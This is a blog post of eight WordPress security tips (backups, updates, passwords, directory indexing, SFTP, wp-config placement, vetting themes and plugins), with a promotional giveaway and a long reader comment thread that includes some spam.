8 Tips to Secure a WordPress Site
106Security is one of those topics that comes up time and time again. You hear the advice, you know you should do it, but somehow, you never get around to it.
The tips in this post are designed to help make your WordPress installation safer and less likely to be hacked or spammed. If you’re short on time, just start at the top and work down. I’ve (roughly) ordered them so that the most important tweaks come first.
We also have a great giveaway at the end of this post, from Sucuri.net and Appsumo. Check it out for the chance to win free site security monitoring for a year!
1 – Set up Backups
This is quite simply a requirement. If you don’t have backups, you’re putting all your eggs in one basket and if something goes wrong, you lose everything. You’d have to be mad to risk this…
There are 3 rules for a good backup:
- It can’t be saved on your server (Because then if your server dies, so do your backups).
- It needs to be automatic (Because you aren’t going to remember to do this yourself every day.
- You need to save a number of them (e.g. if you only save the past 5 backups, and then go on holiday for a week, your backups could all be useless by the time you get home).
Thankfully, they’re easy to do. Here are 3 possible ways:
- Automatic Database Backups to Email
- Automatic Amazon s3 Backups (For VPS users)
- VaultPress – Paid service from Automattic to make handling backups simple.
2 – Always Update WordPress
A fairly common thought used to be that “upgrading WordPress might break my plugins.” And it was true; upgrading WordPress does carry that risk.
Not upgrading is worse; it guarantees that you’re at risk. Almost every WordPress release that comes out has security fixes as part of it. If you don’t update, then by definition, you’re leaving those holes open.
At the very least, you can always do minor updates, e.g. 3.0.1 to 3.0.2. They’re usually solely for security and bugs, so always update right away when one comes out.
As an aside; it’s possible to hide the version of WordPress you’re using by adding this to your functions.php file:
remove_action(‘wp_head’, ‘wp_generator’); |
That’s no substitute for not upgrading though (And if they can load your login page, quite often the design is a dead giveaway anyway).
3 – Choose a Better Password
I know you hear this all the time, but crappy passwords are still the #1 reason for sites being hacked. How do you know if your password sucks?
Easy. Does it make any sense whatsoever as a word/phrase/name? If you can pronounce it at all, it’s probably bad. Your password should be a completely random, meaningless set of letters and numbers.
And the meaningless part is important there. Turning “michael” into “m1ch@el” doesn’t make it secure, it just means the hacker will get it on their second guess instead of their first.
4 – Check Your Site Regularly
You’d be surprised how often your site can be compromised without you even knowing. For instance, a lot of unwanted scripts will hide links all over your pages that only search engines can see.
It’s crucial that you catch on fast because once Google penalizes you, getting your rankings back is a slow, painful process.
One way to check is to use tools like Google Webmaster Tools to see what links Google is finding on your pages.
Another option is to use a tool like Sucuri.net (Which we’re giving away at the end of this post!), which will automatically scan your site regularly and alert you to any issues.
5 – Prevent Directory Indexing
Directory indexing means that if someone loads a folder on your site (e.g. wp-content/plugins/), they will get a list of all the files in it. This is bad because then a hacker can see everything on your server.
The fix is easy, open up your .htaccess file in a text editor and add the following to it:
#Prevent directory indexing Options -Indexes |
6 – Don’t use FTP
FTP is the most common way to add files to your server, but it isn’t secure. Someone can intercept your transmissions and even your access details. If your host allows you to access your server with SSH, then you can use SFTP instead.
Behind the scenes the two work completely differently, but using them is exactly the same. Odds are you can even continue to use your current FTP program with SFTP instead.
There is no reason not to make this swap, so contact your host and ask them if you can use SFTP (Most should allow it).
7 – Move and Update Your WP-Config.php File
Your wp-config.php file doesn’t have to be in your site’s root folder (Where it is by default). You can move it up a folder (So it is no longer in your public web folders at all).
And it’s as easy as it sounds. Just move the file up one folder, and WordPress will know to find it there.
Also, if you’ve had WordPress for a while now, you may not have all the security keys that you should in your wp-config.php file. These keys help encrypt your passwords and other details. All you need to do is go to https://api.wordpress.org/secret-key/1.1/salt/, copy the code it generates, and then paste it into the relevant section of your wp-config.php file.
8 – Take Care Downloading Plugins/Themes
There are a lot of places to find these items, but not all of them are trustworthy. Many sites get caught out because they installed a script with malicious code hidden in it.
Before downloading a theme or plugin, Google the site to see what people say about it. Lots of good reviews and links? Then go for it. Hard to find any? Then best leave it alone.
For plugins; there is usually little reason for a free plugin not to be hosted on WordPress.org, so always go there first (There are still exceptions though, e.g. cforms). Or alternatively, you can buy premium plugins from sites you trust (Again though, check the site first!).
Themes are trickier. The WordPress.org theme directory is great, but a lot of talented theme developers do choose to host their themes on their own sites (The auto-update feature of the plugin directory isn’t so necessary with themes).
If you do take a theme from a 3rd party website, I’d recommend scanning it right away (Spammy paid links in the footer of a theme are a very common find that Google may penalize you for).
And of course, you always have the option of paying for premium themes (Though do be careful of sites selling themes they did not make. You have no guarantee that they haven’t tampered with the theme first).
Win a Year’s Free Security Scanning
Appsumo and Sucuri.net have kindly offered us 2 one-year licenses to their WordPress scanning tools to give away. Sucuri will automatically scan your website and notify you if you if it spots any issues. Better than that, they can help resolve them too.
To enter the competition, just tweet the following:
Update (18th May) – The competition is now over and the winners have been chosen (@ezyblogger and @wpmodder). We’ll more again soon!
I’d like to win a year of Sucuri website monitoring & malware protection on @problogdesign via @appsumo http://bit.ly/j95q8Z
Until midnight tonight only, you can also buy Sucuri’s Business plan for only $85 for the year on Appsumo (Down from $289!). AppSumo gives you a guaranteed refund, no questions asked, so if you buy it and end up winning here, you can get your money back anyway!
Winner will be chosen and emailed this weekend, so good luck!
Enjoy this post? You should follow me on Twitter!
I think #2, #3 and #8 are the most important. Just doing these will make a wordpress blog mostly safe.
Plugins and themes are a huge hole in security, maybe the biggest. Many times script or theme owners put their own eval base64 garbage in them so they get credit. Often these actually pull raw php code from other websites, obfuscated in layers of encoded strings. Guess what, if that other website gets hacked, so does every blog that has those scripts in them. Additionally, the script owner can change the included code at will and can basically execute anything they want on your server! I don’t care how good it looks, if a theme has any obfuscated code in it, stay away!
The risk from someone intercepting a FTP request is pretty low. This would require them to have a packet sniffer somewhere on your local network, or on your server’s network. FTPS or SFTP would be best practices, but I think the real risk for FTP interception is very low.
Thanks for the comment, great to hear your thoughts :)
I agree entirely about the hidden code. If they’re using base64_decode for any reason at all, then just leave the theme alone.
I do think the SFTP tip is worth it though. You’re right that it may never happen, but then, who knows what may get onto your machine someday? Given how crucial those login details are, it just doesn’t seem worth it to me to take the chance. Especially when it only takes a few minutes to setup and from then onwards, it’s just like using FTP anyway.
Some great tips here, picked up one or two things that i didnt even know you could do with WordPress!
Thanks,
Tony.
Its good to use SFTP just to get into the habit of it. That way, if you are on wireless at the airport somewhere and decide to do some work, you don’t accidentally use regular FTP and let people sniff your password.
For the password, I’ve found a 3 to 4 word phrase works, and unless your the CIA, is good for most applications and immune to most dictionary attacks. For example: “I stopped 16 cars” It has the benefit of being easier to remember than random nonsense.
I like your phrase idea. So long as it has some sort of random number in it, that seems like a good way to solve both problems (Complex but easy to remember), very nice.
Hi Michael
Wordpress security seems like a pain until….
Worth noting that Filezilla has a couple of secure methods of transfer.
Just check with your host that they are acceptable.
It was my host who told me about Filezilla secure settings.
For passwords there are some great generators out there.
You can set your password to 12 / 14 digits to include characters, capitals, the lot.
A good read Michael.
I know that you do a few videos Michael, so if you do get a few minutes take a look at a video I have on easyP.
An mini online video training course by Mr Video – Tom Breeze.
I’m sure you’ll find it useful for your own video work.
Keith
Thanks Keith! Yep, Filezilla is a great program. It definitely supports secure options like SFTP, and using them is identical to the regular FTP functions. It’s great! :)
Thanks for the heads up! I’ll definitely check it out! My video skills are very lacking so I’d love the good advice! On my desktop now, to be watched and commented on tomorrow! Looking forward to it, thank you! :)
One of my favorite plugins is called Login Lockdown. It registers the IP address and timestamp of failed logins and then block off those IPs after too many failed logins. It’s great, unless you forgot your password.
That sounds like a great plugin Chris, thanks for sharing. That would stop any sort of brute-force password guessing right away. I like the sound of it!
Michael,
Great post. I am doing some of those things, but there is more work to do. I wasn’t even aware of the sftp. I will try to get that from my host. Thanks for the tips.
Thanks Roberto. SFTP is a really great tool and simple to use once you first set it up. Definitely worth looking into, good luck!
One thing you can do is password protect the wp-admin folder, and if you use diquss or intense debate everything should work just fine.
That’s an interesting one Kevin. Another similar trick I’ve seen is people using .htaccess to limit access to the wp-admin folder to their own IP. It seems a good idea if your IP never changes, but not going to work for me :(
Ya my IP changes so no dice for me lol,
Hi Michael
Thanks for coming over and leaving a great comment.
You are a star.
Hope you are doing well on your university course – not too much drinking. LOL
Haha, we’ll see… ;)
Great tips–and you’re right, a lot of this is common sense, but it seems like this kind of stuff gets knocked aside when people are “busy”. And that Login Lockdown plugin looks really interesting, I’ll have to look into it. Thanks!
I think you’re spot on there. It never seems a priority until you’ve actually been hacked, at which point its too late…
I am happy to find this post very useful for me, as it contains lot of information. Big thumb up for this blog post!
This is a great post! I was actually looking to write one of these posts for my blog. Security is one of the most important things you can do to protect your blog!
Good posts. It’s also good to know that there are plugins that also increases the security of your wordpress site.
Hi Michael,
Great post. I am doing some of those things, but there is more work to do. I wasn’t even aware of the sftp. I will try to get that from my host. Thanks for the tips.
Hi Martin, this is best way to secure our wordpress blog, #1 is the first work we must do. Thanks for nice tips.
I love all these ideas.These are very useful to secure to secure a wordpress site.It is a milestone for a newbie like me.
Important info. I make wordpress sites everyweek and usually never think much about security. I guess until some type of attack happens to you it seems like there’s little to worry about. It’s got me thinking though – I bet if a clients site was attacked they would hold me responsible for that in some way and most of my clients come from word of mouth. I’d be interested to know if anyone has had experience of a clients website being hacked and how did the client / you respond to it?
That’s a great question Kevin. I suppose I’ve been lucky in that none of my clients have ever been hacked (I’ve had clients tell me that they have been or that the site “broke”, but when I looked, the cause was always something they had done, so no issue there).
The question of responsibility is very interesting though. I don’t hold clients to any sort of “maintenance” contract after a project is done. I know that a lot of designers do expect to stay on some sort of monthly retainer though. If that was the case for you, then yes, I’d definitely think that a hacked site was your responsibility to prevent/repair.
As it is though, I only come back to work on a site again when the client gets in touch with me again. As part of that, I usually upgrade WordPress while I’m working, but if they aren’t updating it regularly and they get hacked, that’s not your fault.
The other thing I suppose is that you and I aren’t selling our services as security consultants. Obviously we want everything we make to be secure, but that’s different to guaranteeing a client won’t get hacked. To do that, you need to have control of everything, i.e. how their hosting is set up, what plugins you allow them to install, regular patching etc. which most clients can’t really give you. There’s just no way you can do that without regularly monitoring their whole server (i.e. them keeping you on a retainer)
I think that’s a long winded way of saying that I do everything I reasonably can to make sure a client is kept safe (And none of my clients have ever been hacked, so thats a decent track record), but that’s still not giving them a guarantee (And Id be totally upfront about that with any client who wanted a guarantee).
This is a great post! Thanks for share
Nice article! I didn’t knew about #5 and #7! I’ll add this to my blog asap! :D Thanks for sharing this wonderful article Michael!
Fantastic post – thanks for the tips, very useful.
Fantastic post – thanks for the tips, very useful.
I was just wondering if anyone here is using CloudFlare to help protect there site? I’ve been using their free service for a few days now and so far so good. The only concern I have is that updating pages in my wordpress sites is taking longer the normal. Has anyone else used CloudFlare?
I took a look at CloudFlare as a result of your post I had never heard of them. What do you think of them so far I was thinking about giving it a try.
I’ve been using cloudflare for a couple of weeks and so far it seems pretty good. The website claims 30% speed increase – i’m not sure about that but it does seem a little quicker to load pages. So far many threats and dodgy bots have been blocked which is a big +. You get a nice account with details of all threats blocked which is nice. Just checked my account and 111 unique threats blocked in one week :o) There a few negative reviews around but I haven’t noticed anything bad yet. The worst thing I did find is that Cpanel stops working but you can easily correct this. Check out my blog for more details: http://www.website-design-edinburgh.co.uk/blog/recommended/cloudflare-review/
Is there anyway to check a theme before you actually install it to make sure there are no hidden links or malware on it. I haven’t seen a tool to do that around the net and these steps prompted me to think of this a little closer as I do use or play with a a lot of free themes.
Good tips though – some of them I follow and some I don’t like the directory indexing which is a sensible tip for all sites irrespecitve of Wp or not.
Good list thanks….
Sorry, as far as I’m aware, there aren’t really any automated tools to do this.
Otto has a great post on his site about why this is: http://ottopress.com/2011/scanning-for-malicious-code-is-pointless/
Essentially, the best thing you can do is try out your themes on a test site first and check for any issues there.
Kieran and Michael,
Look at the “Theme-Check” plugin here:
http://wordpress.org/extend/plugins/theme-check/
…it checks for various things, but here’s the security part:
http://codex.wordpress.org/Theme_Review#Theme_Settings_and_Data_Security
That’s a great find Adam, thanks for sharing! It seems a good tool to developers, but more along the lines of making sure you use WordPress best practices. It won’t tell you if there is malicious code in a theme that you’ve downloaded (Though it’s definitely better than nothing, and extremely cool for devs, thanks!)
Yeah, agreed on the shortcomings, but like you said, better than nothing…for now…
Great post! I am going to try the login lock down plug it!
The one thing I wish I did not of is backing things up. That is a hard habit to get in to.
Michael,
Great post. I am doing some of those things, but i disagree with number 6 (about ftp). Thanks for the tips.
Any reason you disagree with it? I know it’s not terribly likely, but SFTP is the safer technology. Areas where you use a public wi-fi in particular could be somewhere to watch out for this.
Yeah, +1 for SFTP,
A client site got hacked recently because her FTP program was hacked. Use SFTP. Period.
This is a great article, and the thing about security is nobody ever wants to hear about it until it’s too late. There are so many things you can do to secure your WordPress website – it’s not funny. +1 on the Login Lockdown plugin, and we also use Secure WordPress to remove the WP footprint from the HTML code, and prevent some types of attacks. There’s another called “Bulletproof Security” in the repository that some are swearing by, as well as “WordPress Firewall 2”.
We have found that the .htaccess in the wp-admin folder is more hassle than it’s worth (causes problems), but having an .htaccess file in the wp-content/uploads folder (limiting file types) is surely worth it. If you want to know more, my free WordPress Security Guide is worth the read if you have the time.
If you want to see what you have to go through to fix an infected site, also try reading our 8,000 word How to fix a Hacked WordPress Blog post and see what a pain it is to recover from the devastation that hacks can do to your site in about 5 minutes.
Thanks again Michael for brining this to peoples attention – security is a topic that never gets old.
Thanks for sharing those links JT, well worth a read for people! Good security advice isn’t always the easiest thing to find online!
Michael,
I’ve been relying on Login Lockdown and automated regular backups – so far with no issues at all. However your post has given me plenty of extra things to think of – In particular, directory listing, ftp use and moving the WP-Config.php. I appreciate this extra info. thanks
Regan
Ah, cool, I’m glad it was of use! Hope the changes went down well!
Thanks for the tips. Got to be I am quite new to wordpress. Found the tip about the themes most relevant as I spent yesterday downloading a number of themes. Better be more careful. Cheers
I have been more that satisfied with WordPress personally, but I have heard some real horror stories out there. I think I may want to make some changes for a preemptive strike.
Very nice tips, they help me a lot to secure my website. Thank you very much :)
Thank you for your great tips. It’s just help me to secure my wordpress blog.
I had some problems with the security of a wordpress blog.. I hope that with this tips everything will go well.
So far I’ve not had any security problems with my WordPress sites, knock on wood. But I did only recently start backing them up and I think that is probably the most important of all the tips you listed. The password one to me is a no brainer. I’m amazed at how so many people use passwords that are really simple to guess. It’s like you’re inviting hackers in! Thanks for the post, good tips.
Hello
Nice post, good informations.
As web security consultant (and plugin developper), i make audit for wordpress plugin.
I don’t want to annoy you talking and talking about this, contact me if you need this service ;)
See you
Great article. Was loking for information like this, since it is an older aticle, are there any further updates to this?
Very useful tips. Get secure with your tips. Good bye hackers…..
Great stuff! Very useful specially for those people (like me) who have no the faintest idea about similar problems. thanks!
These are all great tips. I myself only just started setting up backups which I think is crucial. You don’t want to be stuck when a server goes down and all your work is lost.
Also, I think #3 is the second most important on the list. I know it’s harder to remember, but changing your password to something completely random will help massively.
amazing all tips are simply outstanding
i am looking for more tips and info about wordpress
thanks for sharing great knowledge with us
i agree with your sara backups are the most important tips
aaa My blog is blogspot…. How tu make in Blogspot…???
But thanks for share… q will create wordpress but Not Now..
I am just getting familiar with WordPress and this is terrific information. I will soon be publishing my first Blog and need all the information I can get. Thank you for this Blog.
Brilliant post. I am fairly new to WP, so it’s really good with useful information, thanks
Do you know “WordPress Backup to Dropbox”? That’s a plugin with which you can backup your wordpress to your Dropbox. I also make regular backups via FTP. (Which you say isn’t secure, I honestly never thought about that, so thanks for the advice :) )
Password plays a vital role in security. If we update WordPress,we can enjoy each and every tip of WordPress.
Very informative – WordPress is definitely getting better with its out-of-the-box security too. I like that your admin account doesn’t need to be ‘admin’ now and it gives you the option of changing it.
It would be neat if they did something like ExpressionEngine does, where you can specify a custom system folder is, instead of always being wp-admin, wp-content, and wp-includes
Thanks for the tips .
网站建设包括:网站策划、网页设计、网站功能、网站内容整理、网站推广、网站评估、网站运营、网站整体优化,网站建设的目的是通过网站达到开展网上营销,实现电子商务的目的。
网站建设的实现有以下几个基本的步骤:
第一步:网站建设第一步肯定是租用虚拟主机,域名注册。
第二步:定位网站,分析网站功能和需求。
第三步:网站建设风格设计,网站程序开发。
第四步:网站建设测试,FTP上传。
网推广的几个方法:
第一:最辛苦,也是见效最快的推广办法,论坛推广
首先整理几十个人气最旺的论坛,要是不知怎么找,我告诉你,直接在搜索引擎搜论坛,排在前面的绝对是最火的,还有就是分行业搜索,比如网站推广论坛,肯定是推广论坛中人气最火的。然后注册几个账号,为什么要注册几个呢?留作备用,还有个因素就是有时可以帮顶下帖子。然后就开始发帖、顶贴吧?坚持住就会有很好的效果。还有就是注意方法,不明白的可以去林振军的网站推广技术看看。
第二:博客群推广
这个办法也是很累的,但是效果很好,如果想长期干这行,那一定要试试,见效不是很快,但是一旦见效,那你就厉害了。。
第三:软文推广
这个办法处在论坛推广和博客推广的中间,我最喜欢了,效果非常好,有的时候能在一天内给我带来几十个外部链接和几K的流量,当然和大网站没法比了,但是对于我们来说很好了,方法也很简单,学会写软文,学会找内容、写标题,这些我的林振军推广技术网站都有,可以看看。
第四:百度知道推广
这个办法做好了,流量确实无法猜测,我看这招影视累的网站经常用,方法也不难,就是提前去做,抓住时机,自问自答。
达誉盛(北京)传媒科技有限公司是一家现代化的传媒咨询、广告策划、网站设计、网络营销、网络品牌推广、电子商务一体化服务公司公司于2006年10月01日依 法登记注册,2006年12月1日正式宣布成立。公司坚持“以人为本”的管理思想,倡导“公义、协同、创新”的文化理念,营造“和谐”、“共赢”的工作环境, 将 传统商业模式、创造性地打造出巨大事业发展平台欢迎联系在线q:一七八九五五零三九七,电话零一零八六八六九零零零:。
通过8年的实践和市场经验,我们有专业的技术团队,能够满足不同客户的需求。
达誉盛(北京)传媒科技有限公司
电话:零一零八六八六九零零零 李经理【在线企鹅】:一九四一六零九八二一
uhm! I don’t understand Prevent “Directory Indexing”?.
Great post, these tips are very important to me, i will secure my blog with these great tips…thank you
Thanks my dear your Idea and tips are really perfect. I will try to make with these Tips.
By the way , securing your site doesnt depend on the script in general , the important security and the real security comes from the Server if its well configured and have special rules for general vulns. it will be secured more than script security.
anyways , Great topic !
Hello Michael,
Thanks for providing us these tips to secure our wordpress site. I’m not aware on most of these tips. I really found this post very helpful. Thanks again!
There are three ways someone could break into your WordPress site.
1. If you are running an old version of WordPress then they can use the known security holes in that version to break in. To avoid that you need to keep right up to date.
2. If you are running a poorly written plugin then they may be able to use that to break in. You need to be careful about what plugins you use and keep them to a minimum and also keep those you do use up to date.
3. If they can compromise your computer then they could gain access to it that way. You need to make sure your own computer is properly protected to prevent that happening.
you forgot:
4. if you’re using public wifi and somebody hijacks your connection they can steal your login info and break in that way
5. if you’re not using secure FTP somebody can sniff the packets on the Internet and get your login and break in that way
6. if your webhost doesn’t update and patch the operating system, web server, or cpanel software as often as they should, someone can break into your website using an exploit directly on your web hosting environment
7. if you install software in your web hosting account just to try it (like a forum, another CMS) and they forget about it and don’t update it – they can break into your website through the outdated software and THEN attack your wordpress install
believe it or not, there are even more ways beyond this that someone can compromise your website…
To secure the wordpress site is always an issue for major of the users.Your approach to keep backup doc of all the pages is admirable.
my favorite plugins is called Login Lockdown. It registers the IP address and timestamp of failed logins and then block off those IPs after too many failed logins. It’s great, unless you forgot your password.
You must have to set the values of AUTH, SECURE_AUTH, LOGGED_IN, and NONCE Keys and SALT in wp-config.php to some alphanumeric value. This will secure your Website and prevent it from being hacked.
In addition, you can also change the default username (admin name) of your WordPress Blog at the time of installation. If it is already installed then make use of Admin Name Extender WordPress Plugin to change the name. Reason: hackers know that 95% of wordpress users do not change default admin name at the time of installation.
thanks for the tips, very useful.
I’m awfully late to this party, but I did want to point out that just removing the wp version generator tag (as you mentioned in the article) is generally not enough to prevent someone from discovering what version of wordpress you’re using. Sucuri (which you’ve linked to in this post) has a great tool to show exactly how much information anyone who knows where to look can get. Securing your WP version is fairly difficult – so make sure you update!
After reading a lot of manuals and guide I decided to do something very simple. Signup for Vaultpress and sleep happily forever..
Great work To secure the wordpress !
but i think , now hacker have new trik to hack a wordpress
A friend of mine has a blog that has been hacked and she was not able to recover it anymore. This is why I am looking for this kind of post that could certainly help me improve the security of my blog.
Great post! I am going to try the login lock down plug it!
The one thing I wish I did not of is backing things up. That is a hard habit to get in to.
This is a great post and it has helped me a lot,
This is my first opportunity to visit this website. I found some interesting things and I will apply to the development of my blog. Thanks for sharing useful information.
http://www.hermeshandbagoutlet.com
is why I use Bullet Proof Security, a pulgin written to prevent such attacks on your blog, even when everyone else on a shared hosting
People should be more aware of their blogs and this why they should follow these tips strictly to make their wordpress site secure and useful.
A great article – we so often forget that the tiny mistakes WE make are enough for hackers to break into our site.
Hello Michael,
Great Information. Securing wordpress is very important and often overlooked by many designers. Key is to make sure that no one can access your site that shouldn’t, so ALWAYS make sure you are running the latest version. Old versions have know security issues, and hackers know this. I agree with using SFTP for uploading but not all hosts provide SSH to the server. A solution to this is that once you use FTP or are done with the daily work, change the password in the control panel.
Thanks for this tutorial..will do this for my WordPress blog
Very good guide to secure my wordpress blog. Keep up the good work :)
Candles are so universal that they are used just about everywhere, such as work, home, and there are even wedding candles that are a great addition to any wedding decorating scheme.
Thanks for the tips Michael, i had no idea about the posibility of moving the file wp-config for security.
Thanks for the tips, preventing directory indexing is a great one, also, using SFTP seems like something one should be doing. Good news to find out about Sucuri’s services, they look promising.
I have submitted my site to several directories, especially for this new landing page (which is on page one for its keywords in 5 days of its being indexed) how do I check my files for these directory access? Secondly I upload everything through FileZilla which is FTP if I go into my cpanel file manager what do I look for to see if there are any worms or crawlers that are taking my data?
thank you for your advice, I was looking for some ways to make my art page more secure and found your blog, thanks a lot :-)
I think I am doing it all except the moving the WP config I will do that through my server right now.
This is one of the great blogs I’ve read today. Your site contains lots of good information and I’m sure many people will like it as I do. I would like to give this site a thumb up rating. Keep up the good works guys. I think I’m going to come back to this site regularly. Thanks.
Great post. I am doing some of those things
its a nice post, i will bookmarking it and share in my twitter account, thanks a lot
Nice, +1 for SFTP knowledge
A client site got hacked recently because his FTP program was reverse engineered. Use SFTP always. Stay safe
your tips on wordpress security covering different aspect,its very comprehensive. great! tks
Remarkable design and style, at last discovered the source for alluring wall papers
Great Post !
Had some question on point 2.
What if the premium theme which I am using is not compatible with the latest version of wordpress…
Will all my posts be gone?
I have been contemplating about upgrading my wordpress for fear that all my stuff will be gone due to theme compatibility issue with wordpress….
No, You can easily upgrade your WordPress as well as Theme. All of your posts will be there.
You do not use the admin as the user name. Keep the password as strong as possible means include the capital, small as well as special characters in the password. You should regularly update your wordpress website. As Michael Martin the author of the post said keep the backup of your website regularly. Install the secure plug-ins in the website.